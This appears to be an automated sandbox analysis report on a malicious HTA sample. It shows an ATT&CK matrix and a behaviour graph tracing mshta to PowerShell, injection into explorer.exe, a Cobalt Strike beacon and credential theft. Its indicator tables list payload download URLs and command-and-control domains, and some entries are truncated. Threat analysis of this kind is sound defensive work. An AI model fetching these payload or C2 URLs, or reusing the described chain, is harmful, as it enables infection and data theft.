                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting
                Valid Accounts11
                Native API
                111
                Scripting
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Exploitation for Client Execution
                1
                DLL Side-Loading
                623
                Process Injection
                11
                Deobfuscate/Decode Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                21
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts12
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                1
                Credentials in Registry
                3
                File and Directory Discovery
                SMB/Windows Admin Shares11
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts4
                PowerShell
                Login HookLogin Hook1
                Software Packing
                NTDS128
                System Information Discovery
                Distributed Component Object Model11
                Input Capture
                115
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets531
                Security Software Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Masquerading
                Cached Domain Credentials141
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                Virtualization/Sandbox Evasion
                DCSync13
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job623
                Process Injection
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Hidden Files and Directories
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557927 Sample: bestthingsalwaysgetbesrenti... Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 74 prolinice.ga 2->74 76 ip.1017.filemail.com 2->76 78 1017.filemail.com 2->78 86 Suricata IDS alerts for network traffic 2->86 88 Found malware configuration 2->88 90 Malicious sample detected (through community Yara rule) 2->90 92 16 other signatures 2->92 14 mshta.exe 1 2->14         started        17 djvbaae 2->17         started        signatures3 process4 signatures5 140 Detected Cobalt Strike Beacon 14->140 142 Suspicious powershell command line found 14->142 144 PowerShell case anomaly found 14->144 19 powershell.exe 36 14->19         started        24 conhost.exe 17->24         started        process6 dnsIp7 82 107.172.44.178, 49730, 49738, 80 AS-COLOCROSSINGUS United States 19->82 68 seemybestnetworkwh...sentirelifewith.vbS, Unicode 19->68 dropped 70 C:\Users\user\AppData\...\tnaq44gy.cmdline, Unicode 19->70 dropped 108 Detected Cobalt Strike Beacon 19->108 110 Suspicious powershell command line found 19->110 112 Obfuscated command line found 19->112 114 Found suspicious powershell code related to unpacking or dynamic code loading 19->114 26 wscript.exe 1 19->26         started        29 powershell.exe 21 19->29         started        31 csc.exe 3 19->31         started        34 conhost.exe 19->34         started        file8 signatures9 process10 file11 126 Detected Cobalt Strike Beacon 26->126 128 Suspicious powershell command line found 26->128 130 Wscript starts Powershell (via cmd or directly) 26->130 134 3 other signatures 26->134 36 powershell.exe 7 26->36         started        132 Loading BitLocker PowerShell Module 29->132 72 C:\Users\user\AppData\Local\...\tnaq44gy.dll, PE32 31->72 dropped 39 cvtres.exe 1 31->39         started        signatures12 process13 signatures14 94 Detected Cobalt Strike Beacon 36->94 96 Suspicious powershell command line found 36->96 98 Obfuscated command line found 36->98 41 powershell.exe 15 16 36->41         started        45 conhost.exe 36->45         started        process15 dnsIp16 84 ip.1017.filemail.com 142.215.209.78, 443, 49731 HUMBER-COLLEGECA Canada 41->84 136 Writes to foreign memory regions 41->136 138 Injects a PE file into a foreign processes 41->138 47 aspnet_compiler.exe 41->47         started        signatures17 process18 signatures19 146 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 47->146 148 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 47->148 150 Maps a DLL or memory area into another process 47->150 152 3 other signatures 47->152 50 explorer.exe 47->50 injected process20 dnsIp21 80 prolinice.ga 46.173.214.24, 49781, 49817, 80 GARANT-PARK-INTERNETRU Russian Federation 50->80 66 C:\Users\user\AppData\Roaming\djvbaae, PE32 50->66 dropped 100 Benign windows process drops PE files 50->100 102 Injects code into the Windows Explorer (explorer.exe) 50->102 104 Writes to foreign memory regions 50->104 106 Hides that the sample has been downloaded from the Internet (zone.identifier) 50->106 55 explorer.exe 50->55         started        58 explorer.exe 50->58         started        60 explorer.exe 50->60         started        62 6 other processes 50->62 file22 signatures23 process24 signatures25 116 System process connects to network (likely due to code injection or exploit) 55->116 118 Found evasive API chain (may stop execution after checking mutex) 55->118 120 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 55->120 124 3 other signatures 55->124 122 Tries to harvest and steal browser information (history, passwords, etc) 58->122 64 WerFault.exe 62->64         started        process26

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta22%ReversingLabsScript-JS.Trojan.Acsogenixx
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\djvbaae0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://prolinice.ga/ndex.phps0%Avira URL Cloudsafe
                http://crl.microsoftOZ0%Avira URL Cloudsafe
                http://107.172.44.178/53/WRFFRGT.txt0%Avira URL Cloudsafe
                http://107.172.44.178/53/seemybe0%Avira URL Cloudsafe
                http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF~0%Avira URL Cloudsafe
                http://prolinice.ga/index.php100%Avira URL Cloudmalware
                http://vilendar.ga/index.php100%Avira URL Cloudmalware
                http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFv0%Avira URL Cloudsafe
                http://prolinice.ga/index.phpR0%Avira URL Cloudsafe
                http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF0%Avira URL Cloudsafe
                http://prolinice.ga:80/index.php100%Avira URL Cloudmalware
                http://prolinice.ga/index.phpMozilla/5.00%Avira URL Cloudsafe
                http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe
                http://prolinice.ga/0%Avira URL Cloudsafe
                http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF40%Avira URL Cloudsafe
                http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF90%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                ip.1017.filemail.com
                142.215.209.78
                truefalse
                  high
                  prolinice.ga
                  46.173.214.24
                  truetrue
                    unknown
                    1017.filemail.com
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://107.172.44.178/53/WRFFRGT.txttrue
                      • Avira URL Cloud: safe
                      unknown
                      http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://prolinice.ga/index.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://vilendar.ga/index.phptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904ffalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://aka.ms/odirmrexplorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/chrome_newtabexplorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drfalse
                            high
                            https://duckduckgo.com/ac/?q=explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drfalse
                              high
                              http://crl.microsoftOZpowershell.exe, 00000009.00000002.2161675097.0000000006F03000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  https://powerpoint.office.comcemberexplorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://1017.filemail.compowershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drfalse
                                              high
                                              https://excel.office.comexplorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://107.172.44.178/53/seemybepowershell.exe, 00000001.00000002.1934299085.0000000005367000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://prolinice.ga/ndex.phpsexplorer.exe, 00000011.00000002.2435370827.000000000321C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://schemas.microexplorer.exe, 0000000E.00000002.3016670516.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150001828.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.2152605558.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                                                  high
                                                  https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://go.microspowershell.exe, 00000003.00000002.1824151467.0000000005B3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1934299085.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000004A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drfalse
                                                                  high
                                                                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF~powershell.exe, 00000001.00000002.1954134272.00000000072A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://api.msn.com/qexplorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contoso.com/powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1950833514.0000000005878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1826452749.00000000065A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 0000000E.00000002.3025073202.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2158219797.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIFvpowershell.exe, 00000001.00000002.1954134272.00000000072A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1934299085.0000000004811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1824151467.0000000005541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2660757164.0000000005351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000004A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://prolinice.ga/index.phpRexplorer.exe, 00000011.00000002.2435370827.00000000031D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6Spowershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000E.00000002.3014261792.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.00000000079B1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://wns.windows.com/Lexplorer.exe, 0000000E.00000002.3025073202.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2158219797.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1950833514.0000000005878000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1826452749.00000000065A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://word.office.comexplorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drfalse
                                                                                                        high
                                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://prolinice.ga/explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://go.micropowershell.exe, 00000001.00000002.1934299085.0000000004967000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://contoso.com/Iconpowershell.exe, 00000009.00000002.2105537530.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drfalse
                                                                                                                            high
                                                                                                                            http://prolinice.ga:80/index.phpexplorer.exe, 0000000E.00000002.3025073202.000000000C4A0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            unknown
                                                                                                                            http://www.microsoft.powershell.exe, 00000003.00000002.1828441360.0000000007B90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2652155063.0000000003525000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.ecosia.org/newtab/explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2105537530.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://aka.ms/Vh5j3kexplorer.exe, 0000000E.00000000.2147790112.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://aka.ms/pscore6POpowershell.exe, 00000003.00000002.1824151467.0000000005541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drfalse
                                                                                                                                            high
                                                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 0000000E.00000000.2150818105.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3018536895.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://crl.micropowershell.exe, 00000001.00000002.1932388414.0000000002C4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000011.00000002.2435370827.0000000003231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1824151467.0000000005696000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 0000000E.00000000.2147790112.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3014261792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF4powershell.exe, 00000001.00000002.1953902747.0000000007260000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://api.msn.com/explorer.exe, 0000000E.00000002.3018536895.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2150818105.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
